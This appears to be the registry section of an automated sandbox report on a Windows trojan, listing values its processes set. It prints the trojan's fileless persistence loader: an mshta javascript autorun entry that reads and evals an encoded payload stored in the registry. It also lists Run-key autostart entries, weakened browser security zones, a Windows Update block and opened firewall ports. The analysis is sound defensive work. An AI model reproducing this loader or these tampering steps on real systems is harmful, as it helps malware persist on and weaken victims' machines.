"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "188"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "5E EB A1 E7 3A 47 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "189"
"StoreChangeIDFor64BitProcesses" = "167"
"StoreChangeIDFor32BitProcesses" = "188"
The process PSCustomSetupUtil.exe:3424 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 13 9F 56 1D 5B 26 34 34 C9 B1 74 41 A9 B9 A7"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "190"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35,MSIL" = "AC 5D F5 E7 3A 47 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "191"
"StoreChangeIDFor64BitProcesses" = "169"
"StoreChangeIDFor32BitProcesses" = "190"
The process PSCustomSetupUtil.exe:2168 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 93 F9 4A D0 85 EA 2B 07 80 9D 2D 1F 4B 4C B3"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "206"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35,MSIL" = "10 5A 44 ED 3A 47 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "207"
"StoreChangeIDFor64BitProcesses" = "185"
"StoreChangeIDFor32BitProcesses" = "206"
The process PSCustomSetupUtil.exe:1060 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "ED 1E 4A A0 81 18 55 07 89 FC C7 2A 4B FB 6C 0D"
[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"Path" = "C:\Perl\site\bin;C:\Perl\bin;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;c:\Program Files\Wireshark;%System%\WindowsPowerShell\v1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process PSCustomSetupUtil.exe:2064 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 27 D3 C5 FA FC F8 30 1A 68 FF 27 45 9D 30 78"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process PSCustomSetupUtil.exe:2252 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6B 4D 22 0A 6A 84 61 37 8B 4A 1A 98 18 A7 9A 4B"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "208"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "209"
"Microsoft.PowerShell.Editor.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "DA F4 7F ED 3A 47 D1 01"
"StoreChangeIDFor64BitProcesses" = "187"
"StoreChangeIDFor32BitProcesses" = "208"
The process PSCustomSetupUtil.exe:2104 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 03 79 33 F6 62 8C 9F 6A FF EA 29 41 F6 D3 A6"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35,MSIL" = "CA 96 20 ED 3A 47 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "205"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "206"
"StoreChangeIDFor64BitProcesses" = "184"
"StoreChangeIDFor32BitProcesses" = "205"
The process PSSetupNativeUtils.exe:2572 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 26 DC 09 88 33 1C 71 3A 07 C1 F5 33 E7 D9 85"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
The process regsvr32.exe:684 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 DB BB 78 F8 93 42 7F F5 7A 13 62 AF AC C9 32"
The process regsvr32.exe:1260 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\e307dfcb0a]
"099fdde6" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"regsvr32.exe" = "8888"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"2300" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"mshta javascript:rtEi1tCcY=dHdV;F9A=new ActiveXObject(WScript.Shell);AazGEb26vz=If5us2;xr3jA=F9A.RegRead(HKLM\\software\\e307dfcb0a\\5119f545);z0bAhYGD=aETG;eval(xr3jA);k8EQrP8mTe=2XOyzckhid;$"
[HKCU\Software\e307dfcb0a]
"099fdde6" = "1"
[HKLM\SOFTWARE\e307dfcb0a]
"f4ea4294" = "875"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
"e91fe739" = "%Documents and Settings%\%current user%\Local Settings\Application Data\nabeq\nabeq.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\e307dfcb0a]
"e91fe739" = "%Documents and Settings%\%current user%\Local Settings\Application Data\nabeq\nabeq.exe"
"5232108f" = " ´AEDáù»úÉy’5W֧[SööÈ%6ðvaŒ“둸¡|ÄÉœ`ľæú䨲‚–fvÛ¬:¥î^Ú=¸b5=gâ€ÂÂö%Ãâ€â€ÃƒÆ’â€â€ZÃÂÂoCÆ Ì2fuÃÂÂO"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\e307dfcb0a]
"5119f545" = "WUKSheKLZGfTNmfUp5N8y=0r9lqK0hXXL7NyaalrSqEx9qz57SrUxPFHNIuzyuvu2eYjEvt2VFD6pGTSBy5RIpWAXjZ2Qe06dkROJ3iksUwNM7Ej1NUOdJDj7FTBogU5wndS16xiINcGp7THLkocqwd;fhTn0ZoulHypcLnchka8=f8rBAZynfEBuHIlhdarvPg61KMhhOZT4bvJhOf8EiB;KtzCptkng4KDaNWbwFpqU=QEAxU6UYLt6pnObdlmfWebhiZI0frNQeTBZSZlvWDtKTX4yueeZHTI9tlrtaVos65ex5bDOvc9UXBAl;vxeDNBLwcRCSaf5JZI=825DymiJzNiMiXzgzJHqmRQIf7J7BxD4yPv0gLtf9El0Bp6aqXjMx7fHjodU04YtUWY8GwQ1HiVe0c3MuNLOONzuMqvEWfRzmNX2qazGJGBYsscmmdQXXBj0AddfbC1AGRy;mg7alWBUhJhjscFcLeCBizlH6=VeWGX4x65JZztDLlNkfwQS9hixwvbjqlPClSfUPXWQRqG3Y8fsrL2ZPEst8Shy30f8ENAIXoTnGf9Acqv4USwgHYhxUX05dDD5XjtZonqfZdZeiZoLSD9kSw0IuB4;AYimZlyaIeB9TEpkzKi=eQb3ppUHrdfrZpW8nb3NljmxeUJ9J8otMYFaR;qgjyDFHCVcVewYeuVFJh8NY=sKGpKwiEzNmhkvZE6l6OfyaOmziazrPGhUvzAD2qQoRXGKuv6OuqMsIZcqZRSGijmBzc8bSKVHva4HdCKOHR6T3j3FOrJRtpxLL;vVI4=351E1F0A332F34603F101A2336621800123F326A5E3F16315E46541924207C771F3A0E425738140F1C1C0B40245B10561415021E02341D0A035C2F2D357F413940396B33337267253F55090D074D591035137F113B253413331E282406043F11031420520$"
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1206" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1809" = "3"
[HKCU\Software\e307dfcb0a]
"f4ea4294" = "875"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\e307dfcb0a]
"5119f545" = "WUKSheKLZGfTNmfUp5N8y=0r9lqK0hXXL7NyaalrSqEx9qz57SrUxPFHNIuzyuvu2eYjEvt2VFD6pGTSBy5RIpWAXjZ2Qe06dkROJ3iksUwNM7Ej1NUOdJDj7FTBogU5wndS16xiINcGp7THLkocqwd;fhTn0ZoulHypcLnchka8=f8rBAZynfEBuHIlhdarvPg61KMhhOZT4bvJhOf8EiB;KtzCptkng4KDaNWbwFpqU=QEAxU6UYLt6pnObdlmfWebhiZI0frNQeTBZSZlvWDtKTX4yueeZHTI9tlrtaVos65ex5bDOvc9UXBAl;vxeDNBLwcRCSaf5JZI=825DymiJzNiMiXzgzJHqmRQIf7J7BxD4yPv0gLtf9El0Bp6aqXjMx7fHjodU04YtUWY8GwQ1HiVe0c3MuNLOONzuMqvEWfRzmNX2qazGJGBYsscmmdQXXBj0AddfbC1AGRy;mg7alWBUhJhjscFcLeCBizlH6=VeWGX4x65JZztDLlNkfwQS9hixwvbjqlPClSfUPXWQRqG3Y8fsrL2ZPEst8Shy30f8ENAIXoTnGf9Acqv4USwgHYhxUX05dDD5XjtZonqfZdZeiZoLSD9kSw0IuB4;AYimZlyaIeB9TEpkzKi=eQb3ppUHrdfrZpW8nb3NljmxeUJ9J8otMYFaR;qgjyDFHCVcVewYeuVFJh8NY=sKGpKwiEzNmhkvZE6l6OfyaOmziazrPGhUvzAD2qQoRXGKuv6OuqMsIZcqZRSGijmBzc8bSKVHva4HdCKOHR6T3j3FOrJRtpxLL;vVI4=351E1F0A332F34603F101A2336621800123F326A5E3F16315E46541924207C771F3A0E425738140F1C1C0B40245B10561415021E02341D0A035C2F2D357F413940396B33337267253F55090D074D591035137F113B253413331E282406043F11031420520$"
"0494a3ce" = "1451944624"
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate]
"DisableOSUpgrade" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 4C 14 3E 09 E6 F7 CD 34 D5 D6 70 05 63 7E 1E"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"regsvr32.exe" = "8888"
[HKCU\Software\e307dfcb0a]
"5232108f" = " ´AEDáù»úÉy’5W֧[SööÈ%6ðvaŒ“둸¡|ÄÉœ`ľæú䨲‚–fvÛ¬:¥î^Ú=¸b5=gâ€ÂÂö%Ãâ€â€ÃƒÆ’â€â€ZÃÂÂoCÆ Ì2fuÃÂÂO"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"2300" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1206" = "0"
[HKLM\SOFTWARE\e307dfcb0a]
"52b1e748" = "6BE9CC664270C139"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1809" = "3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\OSUpgrade]
"ReservationsAllowed" = "0"
[HKCU\Software\e307dfcb0a]
"52b1e748" = "6BE9CC664270C139"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"iexplore.exe" = "8888"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"iexplore.exe" = "8888"
[HKLM\SOFTWARE\e307dfcb0a]
"0494a3ce" = "1451944624"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\nabeq\nabeq.exe$"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\nabeq\nabeq.exe$"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"
"AutoConfigURL"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
The process regsvr32.exe:1968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D 8F D3 55 F2 61 91 D8 64 E1 DD 9F 80 D5 18 0B"
The process regsvr32.exe:404 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\E9E0925CF5FA0B1ED]
"39CEFD7302D4BA631BE9" = "39CEFD7302D4BA631BE9"
[HKLM\SOFTWARE\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"WindowsXP-KB968930-x86-ENG.exe" = "Self-Extracting Cabinet"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CC 82 E8 61 BA A5 D5 90 8B 30 D2 E4 F6 23 E5 EE"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\9817AA9EA9B55D19BED]
"24C2B95F96483B157" = "24C2B95F96483B157"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\9817AA9EA9B55D19BED]
[HKLM\SOFTWARE\E9E0925CF5FA0B1ED]
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\E9E0925CF5FA0B1ED]
"39CEFD7302D4BA631BE9"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKLM\SOFTWARE\9817AA9EA9B55D19BED]
"24C2B95F96483B157"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process wsmanhttpconfig.exe:3220 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B 0C 2F 02 FF A5 55 79 F5 B1 4F B6 50 C4 D9 B1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Event Forwarding Plugin]
"ConfigXML" = ""
[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :47001/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"80:TCP" = "80:TCP:*:Enabled:Windows Remote Management - Compatibility Mode (HTTP-In)"
[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"https:// :5986/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"5985:TCP" = "5985:TCP:*:Enabled:Windows Remote Management"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
